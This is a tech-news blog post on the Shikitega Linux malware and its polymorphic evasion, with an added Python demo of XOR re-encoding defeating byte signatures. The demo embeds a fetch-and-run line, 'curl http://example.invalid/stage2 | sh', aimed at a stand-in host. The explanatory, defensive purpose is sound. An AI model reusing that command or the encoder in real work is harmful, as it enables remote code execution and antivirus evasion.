New Linux Malware Discovered, Targets Internet-of-Things Devices and Servers • iPhone in Canada Blog


Researchers at AT&T Alien Labs have discovered a new strain of Linux malware that is difficult to detect and affects both traditional servers and Internet-of-Things devices, which are typically far less well protected than the average computer (via Ars Technica).

The malware, dubbed “Shikitega”, is delivered via a multi-stage infection chain and uses polymorphic encoding to slip under the radar of antivirus products and other defenses. Additionally, Shikitega hosts its command-and-control servers on well-known cloud hosting services so that its traffic appears legitimate.

“Threat actors continue to look for ways to deliver malware in new ways to stay under the radar and avoid detection,” wrote AT&T Alien Labs researcher Ofer Caspi.

“Shikitega malware is delivered in an advanced manner, it uses a polymorphic encoder and it gradually delivers its payload, with each step revealing only a portion of the total payload. In addition, the malware misuses well-known hosting services to host its command and control servers.”
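The quoted description turns on one idea: a polymorphic encoder re-encodes the same payload under a fresh key every time, so no two dropped files share a byte pattern and a static signature written for one sample misses the next. The following is an added illustration, not Shikitega's code nor anything from AT&T Alien Labs' analysis: a toy XOR encoder, a matching decoder, and two scanners, one that looks at the bytes on disk and one that looks at what the bytes become after decoding. The payload text, the hypothetical `example.invalid` URL and the signature string are all constructed for the demo.

```python
import os
from typing import Optional

# Constructed stand-in for the payload. Real samples carry machine code; this is
# harmless text so the demo runs offline. The URL is hypothetical.
PAYLOAD = b"curl http://example.invalid/stage2 | sh"

# A hypothetical byte signature a scanner might hold for the plaintext payload.
SIGNATURE = b"example.invalid/stage2"


def polymorphic_encode(payload: bytes, key: Optional[bytes] = None) -> bytes:
    """XOR-encode payload under a fresh random key (rolling, multi-byte).

    Layout: [key length][key][encoded body]. A real encoder prepends a small
    decoder stub instead of the raw key; the key is stored in clear here only
    to keep the example self-contained.
    """
    if key is None:
        key = os.urandom(4)
    if not 1 <= len(key) <= 255:
        raise ValueError("key must be 1..255 bytes")
    body = bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
    return bytes([len(key)]) + key + body


def decode(blob: bytes) -> bytes:
    """Invert polymorphic_encode: read the key, XOR the body back."""
    klen = blob[0]
    key, body = blob[1:1 + klen], blob[1 + klen:]
    return bytes(b ^ key[i % klen] for i, b in enumerate(body))


def static_scan(sample: bytes, signature: bytes = SIGNATURE) -> bool:
    """Byte-signature check applied to the file as it sits on disk."""
    return signature in sample


def emulated_scan(sample: bytes, signature: bytes = SIGNATURE) -> bool:
    """Scan after running the decoder, i.e. inspect what the sample becomes at run time."""
    return signature in decode(sample)


def demo() -> dict:
    """Encode the same payload twice and compare what each scanner sees."""
    a = polymorphic_encode(PAYLOAD)
    b = polymorphic_encode(PAYLOAD)
    return {
        "variants_differ": a != b,           # two drops, two different byte patterns
        "static_hits": (static_scan(a), static_scan(b)),      # signature misses both
        "emulated_hits": (emulated_scan(a), emulated_scan(b)),  # decoding restores it
    }


if __name__ == "__main__":
    print(demo())
```

The practical takeaway is the one defenders draw from campaigns like this: a hash or byte signature taken from one sample is of little use against the next drop, so detection has to key on what the decoder stub does at run time (memory it unpacks, processes it spawns, hosts it contacts) rather than on the bytes written to disk.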

What exactly Shikitega is ultimately for is not yet clear. It drops the XMRig miner for the Monero cryptocurrency on the victim device, so covert cryptojacking is at least one of its goals.

However, Shikitega also downloads and runs Mettle, a Metasploit payload that is capable of much more than mining.

Mettle can take control of a webcam, steal credentials, and bundle multiple reverse shells into a package that runs on everything from “the tiniest embedded Linux targets to the big iron.” That Shikitega plants Mettle on infected systems indicates there is more going on than clandestine Monero mining.

